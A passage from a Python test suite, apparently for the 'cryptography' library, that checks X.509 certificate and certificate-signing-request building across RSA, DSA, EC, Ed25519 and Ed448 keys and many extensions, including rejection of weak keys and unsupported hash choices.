@pytest.mark.requires_backend_interface(interface=DSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_dsa_private_key(self, backend):
issuer_private_key = DSA_KEY_2048.private_key(backend)
subject_private_key = DSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA1(), backend)
assert cert.version is x509.Version.v3
assert cert.not_valid_before == not_valid_before
assert cert.not_valid_after == not_valid_after
basic_constraints = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is False
assert basic_constraints.value.path_length is None
subject_alternative_name = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(subject_alternative_name.value) == [
x509.DNSName(u"cryptography.io"),
]
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_ec_private_key(self, backend):
_skip_curve_unsupported(backend, ec.SECP256R1())
issuer_private_key = ec.generate_private_key(ec.SECP256R1(), backend)
subject_private_key = ec.generate_private_key(ec.SECP256R1(), backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA1(), backend)
assert cert.version is x509.Version.v3
assert cert.not_valid_before == not_valid_before
assert cert.not_valid_after == not_valid_after
basic_constraints = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is False
assert basic_constraints.value.path_length is None
subject_alternative_name = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(subject_alternative_name.value) == [
x509.DNSName(u"cryptography.io"),
]
@pytest.mark.supported(
only_if=lambda backend: backend.ed25519_supported(),
skip_message="Requires OpenSSL with Ed25519 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_ed25519(self, backend):
issuer_private_key = ed25519.Ed25519PrivateKey.generate()
subject_private_key = ed25519.Ed25519PrivateKey.generate()
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, None, backend)
issuer_private_key.public_key().verify(
cert.signature, cert.tbs_certificate_bytes
)
assert cert.signature_algorithm_oid == SignatureAlgorithmOID.ED25519
assert cert.signature_hash_algorithm is None
assert isinstance(cert.public_key(), ed25519.Ed25519PublicKey)
assert cert.version is x509.Version.v3
assert cert.not_valid_before == not_valid_before
assert cert.not_valid_after == not_valid_after
basic_constraints = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is False
assert basic_constraints.value.path_length is None
subject_alternative_name = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(subject_alternative_name.value) == [
x509.DNSName(u"cryptography.io"),
]
@pytest.mark.supported(
only_if=lambda backend: backend.ed25519_supported(),
skip_message="Requires OpenSSL with Ed25519 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_build_cert_with_public_ed25519_rsa_sig(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = ed25519.Ed25519PrivateKey.generate()
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA256(), backend)
issuer_private_key.public_key().verify(
cert.signature, cert.tbs_certificate_bytes, padding.PKCS1v15(),
cert.signature_hash_algorithm
)
assert cert.signature_algorithm_oid == (
SignatureAlgorithmOID.RSA_WITH_SHA256
)
assert isinstance(cert.signature_hash_algorithm, hashes.SHA256)
assert isinstance(cert.public_key(), ed25519.Ed25519PublicKey)
@pytest.mark.supported(
only_if=lambda backend: backend.ed448_supported(),
skip_message="Requires OpenSSL with Ed448 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_ed448(self, backend):
issuer_private_key = ed448.Ed448PrivateKey.generate()
subject_private_key = ed448.Ed448PrivateKey.generate()
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, None, backend)
issuer_private_key.public_key().verify(
cert.signature, cert.tbs_certificate_bytes
)
assert cert.signature_algorithm_oid == SignatureAlgorithmOID.ED448
assert cert.signature_hash_algorithm is None
assert isinstance(cert.public_key(), ed448.Ed448PublicKey)
assert cert.version is x509.Version.v3
assert cert.not_valid_before == not_valid_before
assert cert.not_valid_after == not_valid_after
basic_constraints = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is False
assert basic_constraints.value.path_length is None
subject_alternative_name = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(subject_alternative_name.value) == [
x509.DNSName(u"cryptography.io"),
]
@pytest.mark.supported(
only_if=lambda backend: backend.ed448_supported(),
skip_message="Requires OpenSSL with Ed448 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_build_cert_with_public_ed448_rsa_sig(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = ed448.Ed448PrivateKey.generate()
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA256(), backend)
issuer_private_key.public_key().verify(
cert.signature, cert.tbs_certificate_bytes, padding.PKCS1v15(),
cert.signature_hash_algorithm
)
assert cert.signature_algorithm_oid == (
SignatureAlgorithmOID.RSA_WITH_SHA256
)
assert isinstance(cert.signature_hash_algorithm, hashes.SHA256)
assert isinstance(cert.public_key(), ed448.Ed448PublicKey)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_cert_with_rsa_key_too_small(self, backend):
issuer_private_key = RSA_KEY_512.private_key(backend)
subject_private_key = RSA_KEY_512.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
with pytest.raises(ValueError):
builder.sign(issuer_private_key, hashes.SHA512(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
@pytest.mark.parametrize(
"add_ext",
[
x509.SubjectAlternativeName(
[
# These examples exist to verify compatibility with
# certificates that have utf8 encoded data in the ia5string
x509.DNSName._init_without_validation(u'a\xedt\xe1s.test'),
x509.RFC822Name._init_without_validation(
u'test@a\xedt\xe1s.test'
),
x509.UniformResourceIdentifier._init_without_validation(
u'http://a\xedt\xe1s.test'
),
]
),
x509.CertificatePolicies([
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
[u"http://other.com/cps"]
)
]),
x509.CertificatePolicies([
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
None
)
]),
x509.CertificatePolicies([
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
[
u"http://example.com/cps",
u"http://other.com/cps",
x509.UserNotice(
x509.NoticeReference(u"my org", [1, 2, 3, 4]),
u"thing"
)
]
)
]),
x509.CertificatePolicies([
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
[
u"http://example.com/cps",
x509.UserNotice(
x509.NoticeReference(u"UTF8\u2122'", [1, 2, 3, 4]),
u"We heart UTF8!\u2122"
)
]
)
]),
x509.CertificatePolicies([
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
[x509.UserNotice(None, u"thing")]
)
]),
x509.CertificatePolicies([
x509.PolicyInformation(
x509.ObjectIdentifier("2.16.840.1.12345.1.2.3.4.1"),
[
x509.UserNotice(
x509.NoticeReference(u"my org", [1, 2, 3, 4]),
None
)
]
)
]),
x509.IssuerAlternativeName([
x509.DNSName(u"myissuer"),
x509.RFC822Name(u"email@domain.com"),
]),
x509.ExtendedKeyUsage([
ExtendedKeyUsageOID.CLIENT_AUTH,
ExtendedKeyUsageOID.SERVER_AUTH,
ExtendedKeyUsageOID.CODE_SIGNING,
]),
x509.InhibitAnyPolicy(3),
x509.TLSFeature([x509.TLSFeatureType.status_request]),
x509.TLSFeature([x509.TLSFeatureType.status_request_v2]),
x509.TLSFeature([
x509.TLSFeatureType.status_request,
x509.TLSFeatureType.status_request_v2
]),
x509.NameConstraints(
permitted_subtrees=[
x509.IPAddress(ipaddress.IPv4Network(u"192.168.0.0/24")),
x509.IPAddress(ipaddress.IPv4Network(u"192.168.0.0/29")),
x509.IPAddress(ipaddress.IPv4Network(u"127.0.0.1/32")),
x509.IPAddress(ipaddress.IPv4Network(u"8.0.0.0/8")),
x509.IPAddress(ipaddress.IPv4Network(u"0.0.0.0/0")),
x509.IPAddress(
ipaddress.IPv6Network(u"FF:0:0:0:0:0:0:0/96")
),
x509.IPAddress(
ipaddress.IPv6Network(u"FF:FF:0:0:0:0:0:0/128")
),
],
excluded_subtrees=[x509.DNSName(u"name.local")]
),
x509.NameConstraints(
permitted_subtrees=[
x509.IPAddress(ipaddress.IPv4Network(u"0.0.0.0/0")),
],
excluded_subtrees=None
),
x509.NameConstraints(
permitted_subtrees=None,
excluded_subtrees=[x509.DNSName(u"name.local")]
),
x509.PolicyConstraints(
require_explicit_policy=None,
inhibit_policy_mapping=1
),
x509.PolicyConstraints(
require_explicit_policy=3,
inhibit_policy_mapping=1
),
x509.PolicyConstraints(
require_explicit_policy=0,
inhibit_policy_mapping=None
),
x509.CRLDistributionPoints([
x509.DistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName([
x509.NameAttribute(
NameOID.COMMON_NAME,
u"indirect CRL for indirectCRL CA3"
),
]),
reasons=None,
crl_issuer=[x509.DirectoryName(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME,
u"Test Certificates 2011"
),
x509.NameAttribute(
NameOID.ORGANIZATIONAL_UNIT_NAME,
u"indirectCRL CA3 cRLIssuer"
),
])
)],
)
]),
x509.CRLDistributionPoints([
x509.DistributionPoint(
full_name=[x509.DirectoryName(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
])
)],
relative_name=None,
reasons=None,
crl_issuer=[x509.DirectoryName(
x509.Name([
x509.NameAttribute(
NameOID.ORGANIZATION_NAME,
u"cryptography Testing"
),
])
)],
)
]),
x509.CRLDistributionPoints([
x509.DistributionPoint(
full_name=[
x509.UniformResourceIdentifier(
u"http://myhost.com/myca.crl"
),
x509.UniformResourceIdentifier(
u"http://backup.myhost.com/myca.crl"
)
],
relative_name=None,
reasons=frozenset([
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise
]),
crl_issuer=[x509.DirectoryName(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
x509.NameAttribute(
NameOID.COMMON_NAME, u"cryptography CA"
),
])
)],
)
]),
x509.CRLDistributionPoints([
x509.DistributionPoint(
full_name=[x509.UniformResourceIdentifier(
u"http://domain.com/some.crl"
)],
relative_name=None,
reasons=frozenset([
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
x509.ReasonFlags.affiliation_changed,
x509.ReasonFlags.superseded,
x509.ReasonFlags.privilege_withdrawn,
x509.ReasonFlags.cessation_of_operation,
x509.ReasonFlags.aa_compromise,
x509.ReasonFlags.certificate_hold,
]),
crl_issuer=None
)
]),
x509.CRLDistributionPoints([
x509.DistributionPoint(
full_name=None,
relative_name=None,
reasons=None,
crl_issuer=[x509.DirectoryName(
x509.Name([
x509.NameAttribute(
NameOID.COMMON_NAME, u"cryptography CA"
),
])
)],
)
]),
x509.CRLDistributionPoints([
x509.DistributionPoint(
full_name=[x509.UniformResourceIdentifier(
u"http://domain.com/some.crl"
)],
relative_name=None,
reasons=frozenset([x509.ReasonFlags.aa_compromise]),
crl_issuer=None
)
]),
x509.FreshestCRL([
x509.DistributionPoint(
full_name=[x509.UniformResourceIdentifier(
u"http://domain.com/some.crl"
)],
relative_name=None,
reasons=frozenset([
x509.ReasonFlags.key_compromise,
x509.ReasonFlags.ca_compromise,
x509.ReasonFlags.affiliation_changed,
x509.ReasonFlags.superseded,
x509.ReasonFlags.privilege_withdrawn,
x509.ReasonFlags.cessation_of_operation,
x509.ReasonFlags.aa_compromise,
x509.ReasonFlags.certificate_hold,
]),
crl_issuer=None
)
]),
x509.FreshestCRL([
x509.DistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName([
x509.NameAttribute(
NameOID.COMMON_NAME,
u"indirect CRL for indirectCRL CA3"
),
]),
reasons=None,
crl_issuer=None,
)
]),
x509.FreshestCRL([
x509.DistributionPoint(
full_name=None,
relative_name=x509.RelativeDistinguishedName([
x509.NameAttribute(
NameOID.COMMON_NAME,
u"indirect CRL for indirectCRL CA3"
),
x509.NameAttribute(
NameOID.COUNTRY_NAME,
u"US"
),
]),
reasons=None,
crl_issuer=None,
)
]),
]
)
def test_ext(self, add_ext, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
cert = x509.CertificateBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
).public_key(
subject_private_key.public_key()
).serial_number(
123
).add_extension(
add_ext, critical=False
).sign(issuer_private_key, hashes.SHA256(), backend)
ext = cert.extensions.get_extension_for_class(type(add_ext))
assert ext.critical is False
assert ext.value == add_ext
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_key_usage(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
cert = x509.CertificateBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
).public_key(
subject_private_key.public_key()
).serial_number(
123
).add_extension(
x509.KeyUsage(
digital_signature=True,
content_commitment=True,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=False
),
critical=False
).sign(issuer_private_key, hashes.SHA256(), backend)
ext = cert.extensions.get_extension_for_oid(ExtensionOID.KEY_USAGE)
assert ext.critical is False
assert ext.value == x509.KeyUsage(
digital_signature=True,
content_commitment=True,
key_encipherment=False,
data_encipherment=False,
key_agreement=False,
key_cert_sign=True,
crl_sign=False,
encipher_only=False,
decipher_only=False
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_ca_request_with_path_length_none(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.ORGANIZATION_NAME,
u'PyCA'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=None), critical=True
).sign(private_key, hashes.SHA1(), backend)
loaded_request = x509.load_pem_x509_csr(
request.public_bytes(encoding=serialization.Encoding.PEM), backend
)
subject = loaded_request.subject
assert isinstance(subject, x509.Name)
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.path_length is None
@pytest.mark.parametrize(
"unrecognized", [
x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.2.3.4.5"),
b"abcdef",
)
]
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_unrecognized_extension(self, backend, unrecognized):
private_key = RSA_KEY_2048.private_key(backend)
cert = x509.CertificateBuilder().subject_name(
x509.Name([x509.NameAttribute(x509.OID_COUNTRY_NAME, u'US')])
).issuer_name(
x509.Name([x509.NameAttribute(x509.OID_COUNTRY_NAME, u'US')])
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
).public_key(
private_key.public_key()
).serial_number(
123
).add_extension(
unrecognized, critical=False
).sign(private_key, hashes.SHA256(), backend)
ext = cert.extensions.get_extension_for_oid(unrecognized.oid)
assert ext.value == unrecognized
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestCertificateSigningRequestBuilder(object):
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_sign_invalid_hash_algorithm(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([])
)
with pytest.raises(TypeError):
builder.sign(private_key, 'NotAHash', backend)
@pytest.mark.supported(
only_if=lambda backend: backend.ed25519_supported(),
skip_message="Requires OpenSSL with Ed25519 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_request_with_unsupported_hash_ed25519(self, backend):
private_key = ed25519.Ed25519PrivateKey.generate()
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
@pytest.mark.supported(
only_if=lambda backend: backend.ed448_supported(),
skip_message="Requires OpenSSL with Ed448 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_request_with_unsupported_hash_ed448(self, backend):
private_key = ed448.Ed448PrivateKey.generate()
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([x509.NameAttribute(NameOID.COUNTRY_NAME, u'US')])
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.supported(
only_if=lambda backend: backend.hash_supported(hashes.MD5()),
skip_message="Requires OpenSSL with MD5 support"
)
def test_sign_rsa_with_md5(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
)
request = builder.sign(private_key, hashes.MD5(), backend)
assert isinstance(request.signature_hash_algorithm, hashes.MD5)
@pytest.mark.requires_backend_interface(interface=DSABackend)
@pytest.mark.supported(
only_if=lambda backend: backend.hash_supported(hashes.MD5()),
skip_message="Requires OpenSSL with MD5 support"
)
def test_sign_dsa_with_md5(self, backend):
private_key = DSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.MD5(), backend)
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
@pytest.mark.supported(
only_if=lambda backend: backend.hash_supported(hashes.MD5()),
skip_message="Requires OpenSSL with MD5 support"
)
def test_sign_ec_with_md5(self, backend):
_skip_curve_unsupported(backend, ec.SECP256R1())
private_key = EC_KEY_SECP256R1.private_key(backend)
builder = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
)
with pytest.raises(ValueError):
builder.sign(private_key, hashes.MD5(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_no_subject_name(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateSigningRequestBuilder()
with pytest.raises(ValueError):
builder.sign(private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_build_ca_request_with_rsa(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, hashes.SHA1(), backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
]
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is True
assert basic_constraints.value.path_length == 2
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_build_ca_request_with_unicode(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.ORGANIZATION_NAME,
u'PyCA\U0001f37a'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, hashes.SHA1(), backend)
loaded_request = x509.load_pem_x509_csr(
request.public_bytes(encoding=serialization.Encoding.PEM), backend
)
subject = loaded_request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA\U0001f37a'),
]
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_subject_dn_asn1_types(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u"mysite.com"),
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
x509.NameAttribute(NameOID.LOCALITY_NAME, u"value"),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"value"),
x509.NameAttribute(NameOID.STREET_ADDRESS, u"value"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"value"),
x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, u"value"),
x509.NameAttribute(NameOID.SERIAL_NUMBER, u"value"),
x509.NameAttribute(NameOID.SURNAME, u"value"),
x509.NameAttribute(NameOID.GIVEN_NAME, u"value"),
x509.NameAttribute(NameOID.TITLE, u"value"),
x509.NameAttribute(NameOID.GENERATION_QUALIFIER, u"value"),
x509.NameAttribute(NameOID.X500_UNIQUE_IDENTIFIER, u"value"),
x509.NameAttribute(NameOID.DN_QUALIFIER, u"value"),
x509.NameAttribute(NameOID.PSEUDONYM, u"value"),
x509.NameAttribute(NameOID.USER_ID, u"value"),
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u"value"),
x509.NameAttribute(NameOID.EMAIL_ADDRESS, u"value"),
x509.NameAttribute(NameOID.JURISDICTION_COUNTRY_NAME, u"US"),
x509.NameAttribute(
NameOID.JURISDICTION_LOCALITY_NAME, u"value"
),
x509.NameAttribute(
NameOID.JURISDICTION_STATE_OR_PROVINCE_NAME, u"value"
),
x509.NameAttribute(NameOID.BUSINESS_CATEGORY, u"value"),
x509.NameAttribute(NameOID.POSTAL_ADDRESS, u"value"),
x509.NameAttribute(NameOID.POSTAL_CODE, u"value"),
])
).sign(private_key, hashes.SHA256(), backend)
for oid, asn1_type in TestNameAttribute.EXPECTED_TYPES:
assert request.subject.get_attributes_for_oid(
oid
)[0]._type == asn1_type
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_build_ca_request_with_multivalue_rdns(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
subject = x509.Name([
x509.RelativeDistinguishedName([
x509.NameAttribute(NameOID.TITLE, u'Test'),
x509.NameAttribute(NameOID.COMMON_NAME, u'Multivalue'),
x509.NameAttribute(NameOID.SURNAME, u'RDNs'),
]),
x509.RelativeDistinguishedName([
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA')
]),
])
request = x509.CertificateSigningRequestBuilder().subject_name(
subject
).sign(private_key, hashes.SHA1(), backend)
loaded_request = x509.load_pem_x509_csr(
request.public_bytes(encoding=serialization.Encoding.PEM), backend
)
assert isinstance(loaded_request.subject, x509.Name)
assert loaded_request.subject == subject
@pytest.mark.requires_backend_interface(interface=RSABackend)
def test_build_nonca_request_with_rsa(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
).add_extension(
x509.BasicConstraints(ca=False, path_length=None), critical=True,
).sign(private_key, hashes.SHA1(), backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
]
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is False
assert basic_constraints.value.path_length is None
@pytest.mark.requires_backend_interface(interface=EllipticCurveBackend)
def test_build_ca_request_with_ec(self, backend):
_skip_curve_unsupported(backend, ec.SECP256R1())
private_key = ec.generate_private_key(ec.SECP256R1(), backend)
request = x509.CertificateSigningRequestBuilder().subject_name(
x509.Name([
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
])
).add_extension(
x509.BasicConstraints(ca=True, path_length=2), critical=True
).sign(private_key, hashes.SHA1(), backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, ec.EllipticCurvePublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
]
basic_constraints = request.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is True
assert basic_constraints.value.path_length == 2
@pytest.mark.supported(
only_if=lambda backend: backend.ed25519_supported(),
skip_message="Requires OpenSSL with Ed25519 support"
)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_build_ca_request_with_ed25519(self, backend):
private_key = ed25519.Ed25519PrivateKey.generate()
